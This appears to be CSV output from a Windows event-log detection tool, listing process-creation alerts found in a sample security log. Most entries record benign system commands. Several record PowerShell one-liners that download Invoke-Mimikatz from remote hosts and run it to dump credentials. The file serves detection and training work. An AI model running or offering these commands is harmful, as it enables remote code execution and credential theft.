C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 